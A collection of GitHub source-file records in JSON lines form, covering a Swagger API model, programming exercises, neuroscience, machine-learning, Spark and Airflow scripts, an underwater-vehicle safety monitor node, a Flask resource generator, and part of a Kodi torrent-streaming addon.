PartialBlockIdentifier\n \"\"\"\n self.swagger_types = {\n 'network_identifier': NetworkIdentifier,\n 'block_identifier': PartialBlockIdentifier\n }\n\n self.attribute_map = {\n 'network_identifier': 'network_identifier',\n 'block_identifier': 'block_identifier'\n }\n self._network_identifier = network_identifier\n self._block_identifier = block_identifier\n\n @classmethod\n def from_dict(cls, dikt) -> 'BlockRequest':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The BlockRequest of this BlockRequest. # noqa: E501\n :rtype: BlockRequest\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def network_identifier(self) -> NetworkIdentifier:\n \"\"\"Gets the network_identifier of this BlockRequest.\n\n\n :return: The network_identifier of this BlockRequest.\n :rtype: NetworkIdentifier\n \"\"\"\n return self._network_identifier\n\n @network_identifier.setter\n def network_identifier(self, network_identifier: NetworkIdentifier):\n \"\"\"Sets the network_identifier of this BlockRequest.\n\n\n :param network_identifier: The network_identifier of this BlockRequest.\n :type network_identifier: NetworkIdentifier\n \"\"\"\n if network_identifier is None:\n raise ValueError(\"Invalid value for `network_identifier`, must not be `None`\") # noqa: E501\n\n self._network_identifier = network_identifier\n\n @property\n def block_identifier(self) -> PartialBlockIdentifier:\n \"\"\"Gets the block_identifier of this BlockRequest.\n\n\n :return: The block_identifier of this BlockRequest.\n :rtype: PartialBlockIdentifier\n \"\"\"\n return self._block_identifier\n\n @block_identifier.setter\n def block_identifier(self, block_identifier: PartialBlockIdentifier):\n \"\"\"Sets the block_identifier of this BlockRequest.\n\n\n :param block_identifier: The block_identifier of this BlockRequest.\n :type block_identifier: PartialBlockIdentifier\n \"\"\"\n if block_identifier is None:\n raise ValueError(\"Invalid value for `block_identifier`, must not be `None`\") # noqa: E501\n\n self._block_identifier = block_identifier\n","repo_name":"xanimo/rosetta-api","sub_path":"server/python-flask-server-generated/swagger_server/models/block_request.py","file_name":"block_request.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"26922470953","text":"def count_ways(n):\n if n<=1:\n return 1\n d=[0]*(n+1)\n d[1]=1\n for i in range(2,n+1):\n d[i]+=d[i-1]\n d[i]+=d[i-3]\n if i%2==0:\n d[i]+=d[i//2]\n return d[n]\nn = int(input(('Введите значение n: ')))\nresult = count_ways(n)\nprint(f'Кол-во способов достичь {n} из точки 1: {result}')\n","repo_name":"setusq/PraktikaG34N6","sub_path":"pz6/dynamic_prog.py","file_name":"dynamic_prog.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"bg","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"24983233708","text":"import mne\nfrom mne.report import Report\nimport basic.process as process\nimport eelbrain as E\nimport os\nfrom mayavi import mlab\nmlab.options.offscreen = True\n\ne = process.NMG(None, '{home}')\nraw = 'calm_fft_hp1_lp40'\ne.set(raw = raw)\ne.set(analysis='data_quality')\n# report = Report()\n\nfor subject in subjects:\n# for _ in e:\n e.set(subject=subject)\n ds = e.load_events()\n ds = ds[ds['target'] == 'prime']\n ds = e.make_epochs(ds, tmin=-.2, tmax=.6, reject={'mag': 3e-12}, baseline=(None, 0))\n # covariance\n if 'epochs' in ds:\n ds = ds.aggregate('target', drop_bad=True)\n cov = e.get('cov', raw = raw + '_auto')\n if os.path.exists(cov):\n cov = mne.read_cov(e.get('cov', raw=raw + '_auto') )\n picks = mne.pick_types(ds['epochs'][0].info)\n evoked_white = mne.cov.whiten_evoked(ds['epochs'][0], cov, picks, diag=True)\n p = evoked_white.plot(picks=picks, unit=False, hline=[-2, 2], show=False)\n report.add_figs_to_section(p, [e.subject + '_cov'], 'Covariance')\n # coregistration\n p = mne.viz.plot_trans(ds.info['raw'].info, trans_fname=e.get('trans'),\n subject=e.subject, subjects_dir=e.get('mri_dir'),\n ch_type='meg', source='head')\n report.add_figs_to_section(p, [e.subject + '_coreg'], 'Coregistration')\n # bem\n p = mne.viz.plot_bem(e.subject, e.get('mri_dir'), 'coronal', show=False)\n report.add_figs_to_section(p, [e.subject + '_bem_coronal'], 'Bem Coronal')\n p = mne.viz.plot_bem(e.subject, e.get('mri_dir'), 'axial', show=False)\n report.add_figs_to_section(p, [e.subject + '_bem_axial'], 'Bem Axial')\n p = mne.viz.plot_bem(e.subject, e.get('mri_dir'), 'sagittal', show=False)\n report.add_figs_to_section(p, [e.subject + '_bem_tranverse'], 'Bem Sagittal')\n \n\nreport.save(e.get('report-file'), open_browser=False)","repo_name":"teonbrooks/NMG-project","sub_path":"exp_scripts/3_mne_report.py","file_name":"3_mne_report.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"36028005217","text":"import warnings\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.externals import joblib\nfrom sklearn.linear_model import LogisticRegressionCV\nfrom sklearn.linear_model.coordinate_descent import ConvergenceWarning\nfrom sklearn.model_selection import train_test_split # 数据划分的类\nfrom sklearn.preprocessing import StandardScaler # 数据标准化\n\n# 设置字符集,防止中文乱码\nmpl.rcParams['font.sans-serif'] = [u'simHei']\nmpl.rcParams['axes.unicode_minus'] = False\n# 拦截异常\nwarnings.filterwarnings(action='ignore', category=ConvergenceWarning)\n\npath = \"datas/breast-cancer-wisconsin.data\"\nnames = ['id', 'Clump Thickness', 'Uniformity of Cell Size', 'Uniformity of Cell Shape',\n 'Marginal Adhesion', 'Single Epithelial Cell Size', 'Bare Nuclei', 'Bland Chromatin', 'Normal Nucleoli',\n 'Mitoses', 'Class']\n\ndf = pd.read_csv(path, header=None, names=names)\n\ndata = df.replace('?', np.nan).dropna(how='any') # 只要有列为空,就进行删除操作\n\nprint(data.head(5))\n\n# 1.数据提取以及数据分割\n# 提取\nX = data[names[1:10]]\nY = data[names[10]]\n\n# 分割\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n\n# 2.数据格式化(归一化)\nss = StandardScaler()\nX_train = ss.fit_transform(X_train) # 训练模型及归一化数据\n\n# 3.模型构建及训练\n\nlr = LogisticRegressionCV(multi_class='ovr', fit_intercept=True, Cs=np.logspace(-2, 2, 20), cv=2, penalty='l2',\n solver='lbfgs', tol=0.01)\nre = lr.fit(X_train, Y_train)\n\nr = re.score(X_train, Y_train)\n\n# 4.模型效果获取\nprint(\"R值(准确率):\", r)\nprint(\"稀疏化特征比率:%.2f%%\" % (np.mean(lr.coef_.ravel() == 0) * 100))\nprint(\"参数:\", re.coef_)\nprint(\"截距:\", re.intercept_)\nprint(re.predict_proba(X_test)) # 获取sigmoid函数返回的概率值\n\n# 5.模型相关信息保存\njoblib.dump(lr, \"result/ss.model\")\n\noss = joblib.load(\"result/ss.model\")\n\n# # 数据预测\n# a.预测数据格式化(归一化)\nX_test = ss.transform(X_test) # 使用模型进行归一化操作\n\n# b.结果数据预测\nY_predict = oss.predict(X_test)\n\n# 图标展示\nx_len = range(len(X_test))\nplt.figure(figsize=(14, 7), facecolor='w')\nplt.ylim(0, 6)\nplt.plot(x_len, Y_test, 'ro', markersize=8, zorder=3, label=u'真实值')\nplt.plot(x_len, Y_predict, 'go', markersize=15, zorder=2, label=u'预测值,$R^2$=%.3f' % re.score(X_test, Y_test))\nplt.legend(loc='upper left')\nplt.xlabel(u'数据编号', fontsize=18)\nplt.xlabel(u'乳腺癌类型', fontsize=18)\nplt.title(u'Logistic回归算法对数据进行分类', fontsize=20)\nplt.show()\n","repo_name":"myDemoMike/MachineLearning","sub_path":"003LinearRegression/逻辑回归:乳腺癌分类.py","file_name":"逻辑回归:乳腺癌分类.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30910866638","text":"def part1(nums):\n jolt_1 = 0\n jolt_3 = 0\n base = 0\n for i in range(len(nums)):\n jolt = min([x for x in nums if base < x <= (base + 3)])\n if (jolt - base) == 1:\n jolt_1 += 1\n if (jolt - base) == 3:\n jolt_3 += 1\n base = jolt\n\n return jolt_1 * (jolt_3 + 1)\n\n\ndef dist_ways_ways(nums, base, index, inf):\n if base == max(nums):\n return 1\n\n key = base * 10000 + index\n if key in inf:\n return inf[key]\n\n w = 0\n ad = [x for x in nums if base < x <= (base + 3)]\n for a in ad:\n if a in nums:\n w = w + dist_ways_ways(nums, a, index + 1, inf)\n\n inf[key] = w\n return w\n\n\ndef part2(nums):\n inf = {}\n return dist_ways_ways(nums, 0, 0, inf)\n\n\nif __name__ == '__main__':\n with open('10.txt') as _file:\n lines = [int(line) for line in _file.read().splitlines()]\n nums = [int(x) for x in lines]\n\n print(\"Part 1 answer: \", part1(nums))\n print(\"Part 2 answer: \", part2(nums))\n","repo_name":"Cipulot/AdventOfCode","sub_path":"2020/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6158059679","text":"# Programa com função ficha() que recebe dois parâmetros opcionais: nome do jogador e quantos gols ele marcou\n# Programa deve mostrar a ficha do jogador, mesmo que algum dado não tenha sido informado corretamente\ndef ficha(jogador='', gols=0):\n print(f'O jogador {jogador} fez {gols} gols(s).')\n\n\nnome = str(input('Digite o nome do jogador: '))\ngols = str(input(f'Quantos gols {nome} fez?'))\nif gols.isnumeric():\n gols = int(gols)\nelse:\n g = 0\nif nome.strip() == '':\n ficha(gols=gols)\nelse:\n ficha(nome, gols)","repo_name":"gabcarvalhaes/curso-em-video","sub_path":"python-mundo-3/exercicios/ex103.py","file_name":"ex103.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"73577172969","text":"from pyspark.sql import SparkSession, Window\nfrom pyspark import find_spark_home, HiveContext\nfrom pyspark.sql.functions import year, col, lit, row_number, desc, dense_rank, to_timestamp\n\nfrom SparkSessionBase import SparkSessionBase\n\nclass RecommendByRecentReview(SparkSessionBase):\n SPARK_URL = \"local\"\n SPARK_APP_NAME = 'TextRandJob'\n ENABLE_HIVE_SUPPORT = True\n\n def __init__(self):\n self.spark = self._create_spark_session()\n\n def start(self):\n hc=HiveContext(self.spark.sparkContext)\n re_df=hc.table('review').limit(50000)\n w1=Window.partitionBy('rev_user_id').orderBy(col('rev_date').desc())\n result=re_df.select('rev_user_id','review_id','rev_business_id','rev_date',dense_rank().over(w1))\n result.show()\n# XXX 大数据分析代码\n\nif __name__ == '__main__':\n RecommendByRecentReview().start()","repo_name":"KYJ2021/bigdata","sub_path":"RecommendByRecentReview.py","file_name":"RecommendByRecentReview.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"36843930595","text":"from time import sleep\n\n\ndef change_direction(current_direction):\n if current_direction == 0:\n return 3\n else:\n return current_direction - 1\n\n\ndef back_direction(current_direction):\n if current_direction == 0:\n return 2\n elif current_direction == 1:\n return 3\n else:\n return current_direction - 2\n\n\ndef set_next(a, b, direction):\n if direction == 3:\n a = a + dy[1]\n b = b + dx[1]\n elif direction == 2:\n a = a + dy[2]\n b = b + dx[2]\n elif direction == 1:\n a = a + dy[0]\n b = b + dx[0]\n else:\n a = a + dy[3]\n b = b + dx[3]\n\n return a, b\n\n\n# 동 서 남 북\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\ncount = 0\nnext_a = 0\nnext_b = 0\n\nn, m = map(int, input().split())\na, b, direction = map(int, input().split())\n\nboard = []\nis_visited = [[0] * m for _ in range(n)] # 0 :아직 안들림 1 : 들림\n\n\nfor i in range(n):\n board.append(list(map(int, input().split())))\n\nis_visited[b][a] = 1\ncount = count + 1\n\nwhile True:\n is_move = False\n for i in range(4):\n direction = change_direction(direction)\n next_a, next_b = set_next(a, b, direction)\n # 바다 거나, 들렸던 칸이면\n if board[next_b][next_a] == 1 or is_visited[next_b][next_a] == 1:\n print(\"바다거나, 들렸던 칸임: [%d, %d]\" % (next_b, next_a))\n sleep(1)\n continue\n else:\n print(\"방문: [%d, %d]\" % (next_b, next_a))\n sleep(1)\n count = count + 1\n a = next_a\n b = next_b\n is_visited[next_b][next_a] = 1\n is_move = True\n break\n next_a, next_b = set_next(a, b, back_direction(direction))\n if board[next_b][next_a] == 1:\n break\n elif is_move == False:\n a = next_a\n b = next_b\n print(\"뒤로가기: [%d, %d]\" % (next_b, next_a))\n sleep(1)\n\n\nprint(count)\n# 1. 방향 바꾸기\n","repo_name":"2yunseong/Algorithm","sub_path":"ndb/implementation/example4_4.py","file_name":"example4_4.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"24231887165","text":"\"\"\"\n有一分数序列:2/1,3/2,5/3,8/5,13/8,21/13...求出这个数列的前20项之和。\n思路:\n引入reduce 进行相加\n规律 前一个的分子是第二个的分母 前一个分子分母相加等于第二个分子\n\"\"\"\nfrom functools import reduce\nl=[]\nm=2\nn=1\nl.append(m/n)\nfor i in range(1,20):\n n,m=m,m+n\n l.append(m/n)\n\nsum = reduce(lambda x,y:x+y,l)\nprint(sum)","repo_name":"liucheng2912/py","sub_path":"100例/24.py","file_name":"24.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6676979504","text":"from airflow import DAG\nfrom airflow.operators.python import PythonOperator\nfrom airflow.utils.dates import days_ago\nfrom utils import strategy\nfrom datetime import timedelta\nimport os\n\nDAG_ID = os.path.basename(__file__).replace('.pyc', '').replace('.py', '')\nCONN_ID = 'postgres_stocks'\n\nSMA = 30\nDEV = 2\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': days_ago(1),\n 'retries': 2,\n 'retry_delay': timedelta(minutes=5),\n 'email_on_failure': False,\n 'email_on_retry': False,\n}\n\nwith DAG(\n dag_id=DAG_ID,\n default_args=default_args,\n schedule_interval='10 1 * * *',\n) as dag:\n\n bollinger_bands_aapl = PythonOperator(\n task_id='bollinger_bands_aapl',\n python_callable=strategy.apply_strategy,\n op_kwargs={\n 'connector': CONN_ID,\n 'source_table_name': 'aapl',\n 'ticker': 'AAPL',\n 'strategy_func': strategy.bollinger_bands_strategy,\n 'op_kwargs': {\n 'sma': SMA,\n 'dev': DEV,\n }\n }\n )\n\n","repo_name":"airflow-courses/udemy_algo_trading_airflow","sub_path":"airflow/dags/strategy/bollinger_bands_strategy.py","file_name":"bollinger_bands_strategy.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"}
+{"seq_id":"20509276815","text":"#!/usr/bin/env python\n#\n# License: BSD\n# https://raw.github.com/stonier/py_trees_ros/license/LICENSE\n#\n##############################################################################\n# Documentation\n##############################################################################\n\n\"\"\"\nThis node captures the rtreachabiliy decision result over safety\n\"\"\"\n\n##############################################################################\n# Imports\n##############################################################################\n\nimport py_trees\nimport rospy\nimport sensor_msgs.msg as sensor_msgs\nfrom std_msgs.msg import Float32\nfrom py_trees_ros import subscribers\n############<>##############################\nimport numpy as np\nimport math\nfrom collections import deque\n############<>################################\n\n##############################################################################\n# Blackboard node\n##############################################################################\n\n\nclass ToBlackboard(subscribers.ToBlackboard):\n \"\"\"\n Subscribes to the battery message and writes battery data to the blackboard.\n Also adds a warning flag to the blackboard if the battery\n is low - note that it does some buffering against ping-pong problems so the warning\n doesn't trigger on/off rapidly when close to the threshold.\n\n When ticking, updates with :attr:`~py_trees.common.Status.RUNNING` if it got no data,\n :attr:`~py_trees.common.Status.SUCCESS` otherwise.\n\n Blackboard Variables:\n * rtreach_result: the raw message from topic /reachability_result\n * emergency_stop_warning (:obj:`bool`)\n * rtreach_warning (:obj:`bool`)\n * rtreach_long_term_warning (:obj:`bool`)\n Args:\n name (:obj:`str`): name of the behaviour\n topic_name (:obj:`str`) : name of the input topic \n enable_emergency_stop (:obj:`float`) : parameter \n rtreach_window_size (:obj:`float`) : parameter \n rtreach_window_threshold (:obj:`float`) : parameter \n \"\"\"\n def __init__(self, \n name, \n topic_name=\"rtreach_result\", \n enable_emergency_stop=True, \n rtreach_window_size=25, \n rtreach_window_threshold=0.75 \n ):\n \n super(ToBlackboard, self).__init__(name=name,\n topic_name=topic_name,\n topic_type=Float32,\n blackboard_variables={\"rtreach_result\":None},\n clearing_policy=py_trees.common.ClearingPolicy.NEVER\n )\n self.blackboard = py_trees.blackboard.Blackboard()\n \n self.blackboard.rtreach_result = Float32()\n \n self.blackboard.emergency_stop_warning = False\n self.blackboard.rtreach_warning = False\n self.blackboard.rtreach_long_term_warning = False\n \n self.enable_emergency_stop=enable_emergency_stop \n self.rtreach_window_size=rtreach_window_size \n self.rtreach_window_threshold=rtreach_window_threshold \n############<>##############################\n self.rtreach_window = deque(maxlen=rtreach_window_size)\n self.rtreach_long_term_pub = rospy.Publisher( '/uuv0/rtreach_long_term',\n Float32,\n queue_size=1) \n############<>################################\n def update(self):\n \"\"\"\n Call the parent to write the raw data to the blackboard and then check against the\n parameters to update the bb variable\n \"\"\"\n self.logger.debug(\"%s.update()\" % self.__class__.__name__)\n status = super(ToBlackboard, self).update()\n if status == py_trees.common.Status.RUNNING:\n return status\n############<>##############################\n # Old way, using binary rtreach output\n # if self.blackboard.rtreach_result.data < 1.0 and self.enable_emergency_stop:\n # self.blackboard.emergency_stop_warning = True\n # rospy.logwarn_throttle(1, \"%s: emergency_stop_warning!\" % self.name)\n \n # long term rtreach\n if rospy.Time.now() > rospy.Time(5): \n val = (max(\n max(\n min(math.exp(self.blackboard.rtreach_index.data) / 4.0, 0.5)\n ,0),\n self.blackboard.rtreach_result.data)\n )\n self.rtreach_window.append(val)\n # 1: safe, 0: unsafe\n if (np.mean(self.rtreach_window) < self.rtreach_window_threshold) and len(self.rtreach_window) == self.rtreach_window_size:\n self.blackboard.rtreach_long_term_warning = True\n rospy.logwarn(\"%s: **** rtreach_long_term_warning (%0.2f)\" % (self.name, val))\n else:\n self.blackboard.rtreach_long_term_warning = False\n\n if self.blackboard.rtreach_result.data < 1.0:\n self.blackboard.rtreach_warning = True\n rospy.logwarn(\"%s: rtreach_warning\" % self.name)\n else:\n self.blackboard.rtreach_warning = False\n self.rtreach_long_term_pub.publish(Float32(np.mean(self.rtreach_window)))\n\n\n############<>################################\n return status\n \n############<>##############################\n############<>################################","repo_name":"AbLECPS/alc","sub_path":"bluerov2_standalone/catkin_ws/src/vandy_bluerov/behaviour_tree_gen/bb_rtreach2bb.py","file_name":"bb_rtreach2bb.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"32239549105","text":"#\n# Rank: MEDIUM\n# Score: 25/25\n# HackerRank Link: https://www.hackerrank.com/challenges/the-time-in-words/problem\n#\n\n# (5, 00, \"five o' clock\"), /\n# (5, 01, \"one minute past five\"),\n# (5, 10, \"ten minutes past five\"),\n# (5, 15, \"quarter past five\"),\n# (5, 28, \"twenty eight minutes past five\"),\n# (5, 30, \"half past five\"),\n# (5, 40, \"twenty minutes to six\"),\n# (5, 45, \"quarter to six\"),\n# (5, 47, \"thirteen minutes to six\")\n\n\nimport math\n\n\ndef the_time_in_words(h, m):\n if m == 0:\n return '{:s}{:s}'.format(number_mapping(h), time_mapping(0))\n\n if m <= 30: # past\n conj = 1\n hour = h\n else: # to\n conj = 2\n hour = (h+1) % 12\n m = 60 - m\n\n minute = number_mapping(m)\n if not minute:\n tens = tens_mapping(int(math.floor(m / 10)))\n units = number_mapping(m % 10)\n\n if not tens:\n minute = units + 'teen'\n elif not units:\n minute = tens\n else:\n minute = '{:s} {:s}'.format(tens, units)\n\n minute = minute_mapping(minute, m)\n\n return '{:s}{:s}{:s}'.format(minute,\n time_mapping(conj),\n number_mapping(hour))\n\n\ndef tens_mapping(t):\n return{\n 2: 'twenty'\n }.get(t, None)\n\n\ndef number_mapping(n):\n return{\n 1: 'one',\n 2: 'two',\n 3: 'three',\n 4: 'four',\n 5: 'five',\n 6: 'six',\n 7: 'seven',\n 8: 'eight',\n 9: 'nine',\n 10: 'ten',\n 11: 'eleven',\n 12: 'twelve',\n 13: 'thirteen',\n 15: 'quarter',\n 30: 'half'\n }.get(n, '')\n\n\ndef time_mapping(t):\n return{\n 0: ' o\\' clock',\n 1: ' past ',\n 2: ' to '\n }.get(t, '')\n\n\ndef minute_mapping(minute, m):\n if m == 15 or m == 30:\n return minute\n return{\n True: '{:s} minutes'.format(minute),\n False: '{:s} minute'.format(minute)\n }.get(m > 1, None)\n","repo_name":"meanthadar-p/python-practice","sub_path":"Medium/TheTimeInWords/TheTimeInWords.py","file_name":"TheTimeInWords.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70544129770","text":"def print_lines (filename):\n with open (filename) as file:\n for line in file:\n print (line.strip())\n\ndef word_search (filename):\n word = input (\"Enter a word: \")\n word_lower = word.lower()\n with open (filename) as file:\n for line in file:\n line = line.strip ()\n line_lower = line.lower ()\n if word_lower == line_lower:\n print (\"Word was found!\")\n file.close ()\n return\n \n print (\"Word was not found!\")\n file.close ()\n\ndef longest_word (a_string):\n tokens = a_string.split()\n longest = \"\"\n for word in tokens:\n if len(word) > len(longest):\n longest = word\n print (longest)\n return longest\n\ndef longest_words (filename):\n longest = \"\"\n with open (filename) as file:\n for line in file:\n stripped = line.strip()\n if stripped != \"\":\n word = longest_word (line)\n if len(word) > len (longest):\n print (word)\n\ndef prompt_and_write ():\n filename = input (\"Enter a filename: \")\n with open (filename, \"w\") as file:\n while True:\n line = input (\">> \")\n if line == \"\":\n break\n else:\n file.write (line)\n file.write (\"\\n\")\n\ndef main ():\n # print_lines (\"data/alice.txt\")\n # word_search (\"data/words.txt\")\n # longest_word (\"The quick brown fox jumped over the lazy dog.\")\n # longest_words (\"data/alice.txt\")\n prompt_and_write ()\n \nif __name__ == \"__main__\":\n main ()\n","repo_name":"alextedesco/GCIS-120","sub_path":"Unit03/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19770966015","text":"# flask_restful_dbbase/generator.py\n\"\"\"\nThis module implements a technique for creating resources with specific\nmethods.\n\nA customized resource can be created from a resource, but with some\nof the default HTTP methods removed, but with customized resource\nmodifications applied to make a unique resource.\n\"\"\"\nfrom flask_restful_dbbase.resources import DBBaseResource\n\n\ndef create_resource(\n name,\n resource_class,\n model_class=None,\n methods=None,\n url_prefix=None,\n url_name=None,\n class_vars=None,\n):\n \"\"\"\n This function creates a resource based on a source model class\n and a seed resource.\n\n Args:\n name: (str) : This will be the name stored with the new\n class.\n\n resource_class: (obj) : This is the ModelResource class that\n will be used as the basis of the new class.\n\n methods: (list) : This the list of HTTP methods that should\n be transferred to the new class.\n\n url_prefix: (str) : This is url_prefix that can be used in place of\n the default url_prefix that comes with the resource class.\n\n url_name: (str) : This the url_name that can be used in place\n of the default url_name that comes with the resource.\n\n class_vars: (dict) : This is a dictionary of variables and\n values that will be transferred to the new resource. These\n are set in place last, so it is here that additional\n customization of the new resource can be made.\n\n Returns:\n (obj) : The new resource class\n \"\"\"\n params = {}\n if model_class is not None:\n params[\"model_class\"] = model_class\n if url_prefix is not None:\n params[\"url_prefix\"] = url_prefix\n if url_prefix is not None:\n params[\"url_name\"] = url_name\n\n # accumulate changes from subclassing\n # follow subclassing order\n class_dict = {}\n idx = resource_class.mro().index(DBBaseResource)\n for i in range(idx - 1, -1, -1):\n cls = resource_class.mro()[i]\n class_dict.update(cls.__dict__)\n if methods is not None:\n # create stop list\n stop_method_list = [\"get\", \"post\", \"put\", \"patch\", \"delete\"]\n for method in methods:\n if method in stop_method_list:\n stop_method_list.remove(method)\n\n for method in stop_method_list:\n del class_dict[method]\n del class_dict[f\"process_{method}_input\"]\n class_dict[\"methods\"] = set([method.upper() for method in methods])\n\n class_dict.update(params)\n\n if class_vars is not None:\n class_dict.update(class_vars)\n\n new_class = type(\n name,\n (DBBaseResource,),\n class_dict,\n )\n\n # required model check\n if new_class.model_class is None:\n raise ValueError(\"A model class must be defined\")\n\n return new_class\n","repo_name":"sidorof/flask-restful-dbbase","sub_path":"flask_restful_dbbase/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"1350131215","text":"\"\"\"The :mod:`pyts.multivariate.utils` module includes utility tools.\"\"\"\n\nfrom sklearn.utils import check_array\n\n\ndef check_3d_array(X):\n \"\"\"Check that the input is a three-dimensional arrayself.\n\n Parameters\n ----------\n X : array-like\n Input data\n\n \"\"\"\n X = check_array(X, ensure_2d=False, allow_nd=True)\n if X.ndim != 3:\n raise ValueError(\"X must be 3-dimensional (got {0}).\".format(X.ndim))\n return X\n","repo_name":"martanto/pyts","sub_path":"pyts/multivariate/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"}
+{"seq_id":"72634647848","text":"# -*- coding: utf-8 -*-\r\nimport xbmc\r\nimport sys, xbmcplugin, xbmcgui, xbmcaddon, os, json, hashlib, re, unicodedata, math, xbmcvfs\r\nimport shutil\r\nfrom urllib.parse import urlparse, quote_plus, unquote, urlencode\r\nfrom urllib.request import urlopen, Request\r\nimport urllib.request, urllib.parse, urllib.error\r\nimport urllib.parse\r\n\r\nfrom metadatautils import MetadataUtils\r\nmg = MetadataUtils()\r\nmg.tmdb.api_key = 'bd6af17904b638d482df1a924f1eabb4'\r\n\r\nAddonID = 'plugin.video.CubeTor'\r\nAddon = xbmcaddon.Addon(AddonID)\r\nAddonName = Addon.getAddonInfo(\"name\")\r\naddonDir = Addon.getAddonInfo('path')\r\nicon = os.path.join(addonDir,\"icon.png\")\r\niconsDir = os.path.join(addonDir, \"resources\", \"images\")\r\n\r\nMUlang = \"pt-BR\" if Addon.getSetting(\"MUlang\") == \"1\" else \"en\"\r\nMUlangM = \"pt-BR\" if Addon.getSetting(\"MUlangM\") == \"1\" else \"en\"\r\nMUcache = True if Addon.getSetting(\"MUcache\") == \"true\" else False\r\nMUcacheEpi = True if Addon.getSetting(\"MUcacheEpi\") == \"true\" else False\r\nMUfanArt = True if Addon.getSetting(\"MUfanArt\") == \"true\" else False\r\n\r\nlibDir = os.path.join(addonDir, 'resources', 'lib')\r\nsys.path.insert(0, libDir)\r\nimport xx, common\r\n\r\naddon_data_dir = xbmcvfs.translatePath(Addon.getAddonInfo(\"profile\"))\r\ncacheDir = os.path.join(addon_data_dir, \"cache\")\r\n#-----------------------------------------\r\nparams = urllib.parse.parse_qs(sys.argv[2][1:])\r\nname = params.get('name',[None])[0]\r\nurl = params.get('url',[None])[0]\r\nmode = params.get('mode',[None])[0]\r\niconimage = params.get('iconimage',[None])[0]\r\nlogos = params.get('logos',[None])[0]\r\ninfo = params.get('info',[None])[0]\r\ndados = params.get('dados',[{}])[0]\r\n#-----------------------------------------\r\ndef PeerSeed(url2):\r\n\timport html\r\n\ttry:\r\n\t\tlink = quote_plus(html.unescape(url2))\r\n\t\tseeds = common.OpenURL(\"https://checker.openwebtorrent.com/check?magnet=\"+link, ssl=True)\r\n\t\tj = json.loads(seeds)\r\n\texcept:\r\n\t\tj = {\"error\": \"nao carregou\"}\r\n\treturn j\r\n#-----------------------------------------\r\ndef BuscaTvShowsPre():\r\n\tq = xbmcgui.Dialog().input(\"O que busca? (Séries)\")\r\n\tif not q:\r\n\t\tRP = \"plugin://plugin.video.CubeTor/?mode=&url=\"\r\n\t\txbmc.executebuiltin('ActivateWindow(10025,\"'+RP+'\")')\r\n\t\treturn\r\n\tRP = \"plugin://plugin.video.CubeTor/?mode=google.BuscaTvShows&url=\"+quote_plus(q)\r\n\txbmc.executebuiltin('ActivateWindow(10025,\"'+RP+'\")')\r\ndef BuscaTvShows():\r\n\tlink = xx.OpenURL(\"http://api.themoviedb.org/3/search/tv?api_key=bd6af17904b638d482df1a924f1eabb4&language=en&query=\"+quote_plus(url))\r\n\tentries=json.loads(link)\r\n\t#ST(entries)\r\n\t#mmm = mg.get_tvshow_details(title=\"\",tmdb_id=url, ignore_cache=MUcache, lang=MUlang)\r\n\tprogress = xbmcgui.DialogProgress()\r\n\tprogress.create('Carregando...')\r\n\tprogress.update(0, \"Carregando...\")\r\n\tprog = 1\r\n\tprogress.close()\r\n\tfor entry in entries['results']:\r\n\t\t#ST(entry)\r\n\t\tif (progress.iscanceled()): break\r\n\t\tprogtotal = int( 100*prog/len(entries['results']) )\r\n\t\tprogress.update(progtotal, str(progtotal)+\" %\")\r\n\t\tprog+=1\r\n\t\ttry:\r\n\t\t\tmmm = mg.get_tvshow_details(title=\"\",tmdb_id=str(entry[\"id\"]), ignore_cache=MUcache, lang=MUlang)\r\n\t\t\t#xx.AddDir(str(entry['id']), \"plugin://plugin.video.elementum/library/movie/play/\"+str(entry['id'])+\"?doresume=true\", \"PlayUrl\", isFolder=False, IsPlayable=True, dados={'mmeta': mm})\r\n\t\t\txx.AddDir(mmm[-1][\"TVShowTitle\"], mmm[-1][\"tmdb_id\"], \"trakt.Shows\", isFolder=True, dados={'meta': 